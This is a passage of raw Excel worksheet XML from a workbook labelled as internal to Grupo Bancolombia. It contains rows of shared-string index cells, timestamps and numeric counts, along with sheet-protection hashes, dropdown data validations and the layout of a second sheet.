      </c>
      <c r="S370" s="83">
        <v>1680</v>
      </c>
      <c r="T370" s="83">
        <v>1759</v>
      </c>
      <c r="U370" s="83">
        <v>35</v>
      </c>
      <c r="V370" s="83">
        <v>18</v>
      </c>
      <c r="W370" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="371" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A371" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B371" s="51">
        <v>44250.62611203704</v>
      </c>
      <c r="C371" s="1" t="s">
        <v>1498</v>
      </c>
      <c r="D371" s="26">
        <v>100</v>
      </c>
      <c r="E371" s="1" t="s">
        <v>1499</v>
      </c>
      <c r="F371" s="26">
        <v>100</v>
      </c>
      <c r="G371" s="57" t="s">
        <v>1500</v>
      </c>
      <c r="H371" s="1" t="s">
        <v>1228</v>
      </c>
      <c r="I371" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J371" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K371" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L371" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M371" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N371" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O371" s="1"/>
      <c r="P371" s="1"/>
      <c r="Q371" s="1" t="s">
        <v>3622</v>
      </c>
      <c r="R371" s="83">
        <v>3297</v>
      </c>
      <c r="S371" s="83">
        <v>4087</v>
      </c>
      <c r="T371" s="83">
        <v>3192</v>
      </c>
      <c r="U371" s="83">
        <v>3032</v>
      </c>
      <c r="V371" s="83">
        <v>4527</v>
      </c>
      <c r="W371" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="372" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A372" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B372" s="80">
        <v>44508.353195914351</v>
      </c>
      <c r="C372" s="1" t="s">
        <v>1530</v>
      </c>
      <c r="D372" s="26">
        <v>102</v>
      </c>
      <c r="E372" s="1" t="s">
        <v>1531</v>
      </c>
      <c r="F372" s="26">
        <v>102</v>
      </c>
      <c r="G372" s="81" t="s">
        <v>1532</v>
      </c>
      <c r="H372" s="1" t="s">
        <v>1533</v>
      </c>
      <c r="I372" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J372" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K372" s="17" t="s">
        <v>27</v>
      </c>
      <c r="L372" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M372" s="17" t="s">
        <v>509</v>
      </c>
      <c r="N372" s="1" t="s">
        <v>510</v>
      </c>
      <c r="O372" s="1" t="s">
        <v>1534</v>
      </c>
      <c r="P372" s="1"/>
      <c r="Q372" s="1" t="s">
        <v>3623</v>
      </c>
      <c r="R372" s="83">
        <v>31557</v>
      </c>
      <c r="S372" s="83">
        <v>379090</v>
      </c>
      <c r="T372" s="83">
        <v>220842</v>
      </c>
      <c r="U372" s="83">
        <v>676274</v>
      </c>
      <c r="V372" s="83">
        <v>710873</v>
      </c>
      <c r="W372" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="373" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A373" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B373" s="51">
        <v>44253.613336840281</v>
      </c>
      <c r="C373" s="1" t="s">
        <v>1667</v>
      </c>
      <c r="D373" s="26">
        <v>100</v>
      </c>
      <c r="E373" s="1" t="s">
        <v>1668</v>
      </c>
      <c r="F373" s="26">
        <v>100</v>
      </c>
      <c r="G373" s="57" t="s">
        <v>1672</v>
      </c>
      <c r="H373" s="1" t="s">
        <v>1670</v>
      </c>
      <c r="I373" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J373" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K373" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L373" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M373" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N373" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O373" s="1"/>
      <c r="P373" s="1"/>
      <c r="Q373" s="1" t="s">
        <v>3624</v>
      </c>
      <c r="R373" s="83">
        <v>45</v>
      </c>
      <c r="S373" s="83">
        <v>30</v>
      </c>
      <c r="T373" s="83">
        <v>52</v>
      </c>
      <c r="U373" s="83">
        <v>33</v>
      </c>
      <c r="V373" s="83">
        <v>28</v>
      </c>
      <c r="W373" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="374" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A374" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B374" s="80">
        <v>44292.099836921298</v>
      </c>
      <c r="C374" s="1" t="s">
        <v>2271</v>
      </c>
      <c r="D374" s="26">
        <v>100</v>
      </c>
      <c r="E374" s="1" t="s">
        <v>2267</v>
      </c>
      <c r="F374" s="26">
        <v>100</v>
      </c>
      <c r="G374" s="81" t="s">
        <v>2268</v>
      </c>
      <c r="H374" s="1" t="s">
        <v>2272</v>
      </c>
      <c r="I374" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J374" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K374" s="17" t="s">
        <v>31</v>
      </c>
      <c r="L374" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M374" s="17" t="s">
        <v>262</v>
      </c>
      <c r="N374" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O374" s="1"/>
      <c r="P374" s="1"/>
      <c r="Q374" s="1" t="s">
        <v>2273</v>
      </c>
      <c r="R374" s="83">
        <v>2246</v>
      </c>
      <c r="S374" s="83">
        <v>1721</v>
      </c>
      <c r="T374" s="83">
        <v>1861</v>
      </c>
      <c r="U374" s="83">
        <v>1804</v>
      </c>
      <c r="V374" s="83">
        <v>2007</v>
      </c>
      <c r="W374" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="375" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A375" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B375" s="51">
        <v>44081.802624340278</v>
      </c>
      <c r="C375" s="1" t="s">
        <v>2271</v>
      </c>
      <c r="D375" s="26">
        <v>201</v>
      </c>
      <c r="E375" s="1" t="s">
        <v>2267</v>
      </c>
      <c r="F375" s="26">
        <v>201</v>
      </c>
      <c r="G375" s="57" t="s">
        <v>2268</v>
      </c>
      <c r="H375" s="1" t="s">
        <v>2272</v>
      </c>
      <c r="I375" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J375" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K375" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L375" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M375" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N375" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O375" s="1"/>
      <c r="P375" s="1"/>
      <c r="Q375" s="1" t="s">
        <v>3625</v>
      </c>
      <c r="R375" s="83">
        <v>2246</v>
      </c>
      <c r="S375" s="83">
        <v>1721</v>
      </c>
      <c r="T375" s="83">
        <v>1861</v>
      </c>
      <c r="U375" s="83">
        <v>1804</v>
      </c>
      <c r="V375" s="83">
        <v>2007</v>
      </c>
      <c r="W375" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="376" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A376" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B376" s="80">
        <v>44312.758632731478</v>
      </c>
      <c r="C376" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="D376" s="26">
        <v>100</v>
      </c>
      <c r="E376" s="1" t="s">
        <v>2664</v>
      </c>
      <c r="F376" s="26">
        <v>100</v>
      </c>
      <c r="G376" s="81" t="s">
        <v>2665</v>
      </c>
      <c r="H376" s="1" t="s">
        <v>2666</v>
      </c>
      <c r="I376" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J376" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K376" s="17" t="s">
        <v>31</v>
      </c>
      <c r="L376" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M376" s="17" t="s">
        <v>262</v>
      </c>
      <c r="N376" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O376" s="1"/>
      <c r="P376" s="1"/>
      <c r="Q376" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R376" s="83">
        <v>11447</v>
      </c>
      <c r="S376" s="83">
        <v>9866</v>
      </c>
      <c r="T376" s="83">
        <v>7230</v>
      </c>
      <c r="U376" s="83">
        <v>13518</v>
      </c>
      <c r="V376" s="83">
        <v>13750</v>
      </c>
      <c r="W376" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="377" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A377" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B377" s="51">
        <v>44517.897685173608</v>
      </c>
      <c r="C377" s="1" t="s">
        <v>2865</v>
      </c>
      <c r="D377" s="26">
        <v>204</v>
      </c>
      <c r="E377" s="1" t="s">
        <v>2866</v>
      </c>
      <c r="F377" s="26">
        <v>102</v>
      </c>
      <c r="G377" s="57" t="s">
        <v>2867</v>
      </c>
      <c r="H377" s="1" t="s">
        <v>2868</v>
      </c>
      <c r="I377" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J377" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K377" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L377" s="17" t="s">
        <v>83</v>
      </c>
      <c r="M377" s="17" t="s">
        <v>72</v>
      </c>
      <c r="N377" s="1"/>
      <c r="O377" s="1"/>
      <c r="P377" s="1"/>
      <c r="Q377" s="1" t="s">
        <v>3626</v>
      </c>
      <c r="R377" s="83">
        <v>3154</v>
      </c>
      <c r="S377" s="83">
        <v>2677</v>
      </c>
      <c r="T377" s="83">
        <v>54</v>
      </c>
      <c r="U377" s="83">
        <v>50</v>
      </c>
      <c r="V377" s="83">
        <v>787</v>
      </c>
      <c r="W377" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="378" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A378" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B378" s="80">
        <v>44020.762400439817</v>
      </c>
      <c r="C378" s="1" t="s">
        <v>2865</v>
      </c>
      <c r="D378" s="26">
        <v>101</v>
      </c>
      <c r="E378" s="1" t="s">
        <v>2870</v>
      </c>
      <c r="F378" s="26">
        <v>101</v>
      </c>
      <c r="G378" s="81" t="s">
        <v>2871</v>
      </c>
      <c r="H378" s="1" t="s">
        <v>2872</v>
      </c>
      <c r="I378" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J378" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K378" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L378" s="17" t="s">
        <v>83</v>
      </c>
      <c r="M378" s="17" t="s">
        <v>72</v>
      </c>
      <c r="N378" s="1"/>
      <c r="O378" s="1"/>
      <c r="P378" s="1"/>
      <c r="Q378" s="1" t="s">
        <v>3627</v>
      </c>
      <c r="R378" s="83">
        <v>6585</v>
      </c>
      <c r="S378" s="83">
        <v>5885</v>
      </c>
      <c r="T378" s="83">
        <v>5914</v>
      </c>
      <c r="U378" s="83">
        <v>6081</v>
      </c>
      <c r="V378" s="83">
        <v>4798</v>
      </c>
      <c r="W378" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="379" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A379" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B379" s="51">
        <v>44495.791363599536</v>
      </c>
      <c r="C379" s="1" t="s">
        <v>2865</v>
      </c>
      <c r="D379" s="26">
        <v>204</v>
      </c>
      <c r="E379" s="1" t="s">
        <v>2870</v>
      </c>
      <c r="F379" s="26">
        <v>202</v>
      </c>
      <c r="G379" s="57" t="s">
        <v>2874</v>
      </c>
      <c r="H379" s="1" t="s">
        <v>2872</v>
      </c>
      <c r="I379" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J379" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K379" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L379" s="17" t="s">
        <v>83</v>
      </c>
      <c r="M379" s="17" t="s">
        <v>72</v>
      </c>
      <c r="N379" s="1"/>
      <c r="O379" s="1"/>
      <c r="P379" s="1"/>
      <c r="Q379" s="1" t="s">
        <v>3626</v>
      </c>
      <c r="R379" s="83">
        <v>165812</v>
      </c>
      <c r="S379" s="83">
        <v>873013</v>
      </c>
      <c r="T379" s="83">
        <v>1045252</v>
      </c>
      <c r="U379" s="83">
        <v>1095967</v>
      </c>
      <c r="V379" s="83">
        <v>1127387</v>
      </c>
      <c r="W379" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="380" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A380" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B380" s="51">
        <v>44714.467278402779</v>
      </c>
      <c r="C380" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D380" s="26">
        <v>100</v>
      </c>
      <c r="E380" s="1" t="s">
        <v>2959</v>
      </c>
      <c r="F380" s="26">
        <v>100</v>
      </c>
      <c r="G380" s="57" t="s">
        <v>2960</v>
      </c>
      <c r="H380" s="1" t="s">
        <v>2965</v>
      </c>
      <c r="I380" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J380" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K380" s="17" t="s">
        <v>10</v>
      </c>
      <c r="L380" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M380" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N380" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O380" s="1"/>
      <c r="P380" s="1"/>
      <c r="Q380" s="1" t="s">
        <v>1413</v>
      </c>
      <c r="R380" s="83">
        <v>40128175</v>
      </c>
      <c r="S380" s="83">
        <v>35134289</v>
      </c>
      <c r="T380" s="83">
        <v>38911106</v>
      </c>
      <c r="U380" s="83">
        <v>38660405</v>
      </c>
      <c r="V380" s="83">
        <v>44806196</v>
      </c>
      <c r="W380" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="381" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A381" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B381" s="51">
        <v>44714.467278414355</v>
      </c>
      <c r="C381" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D381" s="26">
        <v>100</v>
      </c>
      <c r="E381" s="1" t="s">
        <v>2966</v>
      </c>
      <c r="F381" s="26">
        <v>100</v>
      </c>
      <c r="G381" s="57" t="s">
        <v>2967</v>
      </c>
      <c r="H381" s="1" t="s">
        <v>2968</v>
      </c>
      <c r="I381" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J381" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K381" s="17" t="s">
        <v>10</v>
      </c>
      <c r="L381" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M381" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N381" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O381" s="1"/>
      <c r="P381" s="1"/>
      <c r="Q381" s="1" t="s">
        <v>1413</v>
      </c>
      <c r="R381" s="83">
        <v>100867</v>
      </c>
      <c r="S381" s="83">
        <v>142294</v>
      </c>
      <c r="T381" s="83">
        <v>130189</v>
      </c>
      <c r="U381" s="83">
        <v>262576</v>
      </c>
      <c r="V381" s="83">
        <v>806818</v>
      </c>
      <c r="W381" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="382" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A382" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B382" s="51">
        <v>44714.470675266202</v>
      </c>
      <c r="C382" s="1" t="s">
        <v>3048</v>
      </c>
      <c r="D382" s="26">
        <v>100</v>
      </c>
      <c r="E382" s="1" t="s">
        <v>3049</v>
      </c>
      <c r="F382" s="26">
        <v>100</v>
      </c>
      <c r="G382" s="57" t="s">
        <v>3050</v>
      </c>
      <c r="H382" s="1" t="s">
        <v>1360</v>
      </c>
      <c r="I382" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J382" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K382" s="17" t="s">
        <v>10</v>
      </c>
      <c r="L382" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M382" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N382" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O382" s="1"/>
      <c r="P382" s="1"/>
      <c r="Q382" s="1" t="s">
        <v>1413</v>
      </c>
      <c r="R382" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S382" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T382" s="83">
        <v>2</v>
      </c>
      <c r="U382" s="83">
        <v>753</v>
      </c>
      <c r="V382" s="83">
        <v>2127812</v>
      </c>
      <c r="W382" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="383" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A383" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B383" s="80">
        <v>44292.085362627316</v>
      </c>
      <c r="C383" s="1" t="s">
        <v>3433</v>
      </c>
      <c r="D383" s="26">
        <v>106</v>
      </c>
      <c r="E383" s="1" t="s">
        <v>3434</v>
      </c>
      <c r="F383" s="26">
        <v>106</v>
      </c>
      <c r="G383" s="81" t="s">
        <v>3435</v>
      </c>
      <c r="H383" s="1" t="s">
        <v>1736</v>
      </c>
      <c r="I383" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J383" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K383" s="17" t="s">
        <v>31</v>
      </c>
      <c r="L383" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M383" s="17" t="s">
        <v>262</v>
      </c>
      <c r="N383" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O383" s="1"/>
      <c r="P383" s="1"/>
      <c r="Q383" s="1" t="s">
        <v>3628</v>
      </c>
      <c r="R383" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S383" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T383" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U383" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V383" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W383" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="384" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A384" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B384" s="51">
        <v>44292.085362638885</v>
      </c>
      <c r="C384" s="1" t="s">
        <v>3433</v>
      </c>
      <c r="D384" s="26">
        <v>106</v>
      </c>
      <c r="E384" s="1" t="s">
        <v>3437</v>
      </c>
      <c r="F384" s="26">
        <v>106</v>
      </c>
      <c r="G384" s="57" t="s">
        <v>3438</v>
      </c>
      <c r="H384" s="1" t="s">
        <v>2395</v>
      </c>
      <c r="I384" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J384" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K384" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L384" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M384" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N384" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O384" s="1"/>
      <c r="P384" s="1"/>
      <c r="Q384" s="1" t="s">
        <v>3628</v>
      </c>
      <c r="R384" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S384" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T384" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U384" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V384" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W384" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="385" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A385" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B385" s="80">
        <v>44292.08536261574</v>
      </c>
      <c r="C385" s="1" t="s">
        <v>3433</v>
      </c>
      <c r="D385" s="26">
        <v>106</v>
      </c>
      <c r="E385" s="1" t="s">
        <v>3440</v>
      </c>
      <c r="F385" s="26">
        <v>106</v>
      </c>
      <c r="G385" s="81" t="s">
        <v>3441</v>
      </c>
      <c r="H385" s="1" t="s">
        <v>2850</v>
      </c>
      <c r="I385" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J385" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K385" s="17" t="s">
        <v>31</v>
      </c>
      <c r="L385" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M385" s="17" t="s">
        <v>262</v>
      </c>
      <c r="N385" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O385" s="1"/>
      <c r="P385" s="1"/>
      <c r="Q385" s="1" t="s">
        <v>3628</v>
      </c>
      <c r="R385" s="83">
        <v>62</v>
      </c>
      <c r="S385" s="83">
        <v>71</v>
      </c>
      <c r="T385" s="83">
        <v>88</v>
      </c>
      <c r="U385" s="83">
        <v>49</v>
      </c>
      <c r="V385" s="83">
        <v>57</v>
      </c>
      <c r="W385" s="1" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="386" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A386" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B386" s="51">
        <v>44250.648645960646</v>
      </c>
      <c r="C386" s="1" t="s">
        <v>3433</v>
      </c>
      <c r="D386" s="26">
        <v>106</v>
      </c>
      <c r="E386" s="1" t="s">
        <v>3442</v>
      </c>
      <c r="F386" s="26">
        <v>100</v>
      </c>
      <c r="G386" s="57" t="s">
        <v>3443</v>
      </c>
      <c r="H386" s="1" t="s">
        <v>3444</v>
      </c>
      <c r="I386" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J386" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K386" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L386" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M386" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N386" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O386" s="1"/>
      <c r="P386" s="1"/>
      <c r="Q386" s="1" t="s">
        <v>3628</v>
      </c>
      <c r="R386" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S386" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T386" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U386" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V386" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W386" s="1" t="s">
        <v>293</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection algorithmName="SHA-512" hashValue="bfWfrhhzwJ0Ax9qOXB8A8JAv5IiR+FPW79QvRajpV0QUN6wrKb5dVbhiHuDTh9o+Q+/h3R0ntWmdrCVCcHpwhQ==" saltValue="mIPBVv6Y0qgWiJJalzJQBg==" spinCount="100000" sheet="1" sort="0" autoFilter="0" pivotTables="0"/>
  <phoneticPr fontId="10" type="noConversion"/>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="J2:J386" xr:uid="{E6047BA8-BABC-4095-BC86-4C7126F3D4F6}">
      <formula1>INDIRECT(I2)</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#&amp;C&amp;G</oddHeader>
  </headerFooter>
  <legacyDrawing r:id="rId2"/>
  <legacyDrawingHF r:id="rId3"/>
  <tableParts count="1">
    <tablePart r:id="rId4"/>
  </tableParts>
  <extLst>
    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{CCE6A557-97BC-4b89-ADB6-D9C93CAAB3DF}">
      <x14:dataValidations xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" count="1">
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" xr:uid="{234AA6BE-467A-4A75-A65F-B3754B517347}">
          <x14:formula1>
            <xm:f>Lista!$A$1:$R$1</xm:f>
          </x14:formula1>
          <xm:sqref>I2:I386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3DB85-BD7D-4CF6-A8B1-9048D4777E09}">
  <sheetPr codeName="Hoja11"/>
  <dimension ref="A1:J3"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E18" sqref="E18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="14.90625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="56" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="9" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="40.6328125" customWidth="1"/>
    <col min="5" max="5" width="48.90625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="27.90625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="23.90625" customWidth="1"/>
    <col min="8" max="8" width="20.453125" customWidth="1"/>
    <col min="9" max="9" width="19.08984375" customWidth="1"/>
    <col min="10" max="10" width="18.36328125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A1" s="37" t="s">
        <v>1</v>
      </c>
      <c r="B1" s="38" t="s">
        <v>54</v>
      </c>
      <c r="C1" s="39" t="s">
        <v>55</v>
      </c>
      <c r="D1" s="38" t="s">
        <v>57</v>
      </c>
      <c r="E1" s="38" t="s">
        <v>58</v>
      </c>
      <c r="F1" s="38" t="s">
        <v>59</v>
      </c>
      <c r="G1" s="38" t="s">
        <v>63</v>
      </c>
      <c r="H1" s="38" t="s">
        <v>64</v>
      </c>
      <c r="I1" s="40" t="s">
        <v>65</v>
      </c>
      <c r="J1" s="38" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A2" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B2" s="35" t="s">
        <v>3928</v>
      </c>
      <c r="C2" s="26">
        <v>100</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="E2" s="1" t="s">
        <v>268</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>269</v>
      </c>
      <c r="G2" s="1"/>
      <c r="H2" s="1"/>
      <c r="I2" s="1" t="s">
        <v>3929</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="3" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A3" s="17" t="s">
        <v>5</v>
      </c>
      <c r="B3" s="36" t="s">
        <v>3930</v>
      </c>
      <c r="C3" s="25">
        <v>100</v>
      </c>
      <c r="D3" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="E3" s="17" t="s">
        <v>268</v>
      </c>
      <c r="F3" s="17" t="s">
        <v>269</v>
      </c>
      <c r="G3" s="17"/>
      <c r="H3" s="17"/>
      <c r="I3" s="17" t="s">
        <v>3931</v>
      </c>
      <c r="J3" s="17" t="s">
        <v>5</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection algorithmName="SHA-512" hashValue="HPW1T+fh09Ar5HChjZ3Bw2Lt8IvKIbulx929tbJIsrAYzCgt/UXgyQRK04iqX0zAba4Jz9YwHApzaD0CulcXBw==" saltValue="AMbY9uWI/F6GgbZaj7DUDg==" spinCount="100000" sheet="1" sort="0" autoFilter="0" pivotTables="0"/>
  <dataValidations disablePrompts="1" count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="F2:F3" xr:uid="{721ECFDF-B3D7-4553-97FB-8D914F2D6351}">
      <formula1>INDIRECT(E2)</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;C&amp;G&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#</oddHeader>
  </headerFooter>
  <legacyDrawingHF r:id="rId2"/>
  <tableParts count="1">
    <tablePart r:id="rId3"/>
  </tableParts>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A73074A8-D99C-44B8-925A-E30D5DBECD26}">
          <x14:formula1>
            <xm:f>Lista!$A$1:$R$1</xm:f>
          </x14:formula1>
          <xm:sqref>E2:E3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41A38-21F2-44C3-8886-2F2231952AAA}">
  <sheetPr codeName="Hoja12"/>
  <dimension ref="A1:J38"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B30" sqref="B30"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="2" max="2" width="49.453125" customWidth="1"/>
    <col min="4" max="4" width="14.90625" customWidth="1"/>
    <col min="5" max="5" width="30.90625" customWidth="1"/>
    <col min="6" max="6" width="34" customWidth="1"/>
    <col min="7" max="7" width="21.54296875" customWidth="1"/>
    <col min="8" max="9" width="16.90625" customWidth="1"/>
    <col min="10" max="10" width="13.36328125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A1" s="20" t="s">
        <v>1</v>
      </c>
      <c r="B1" s="20" t="s">
        <v>54</v>
      </c>
      <c r="C1" s="21" t="s">
        <v>55</v>
      </c>
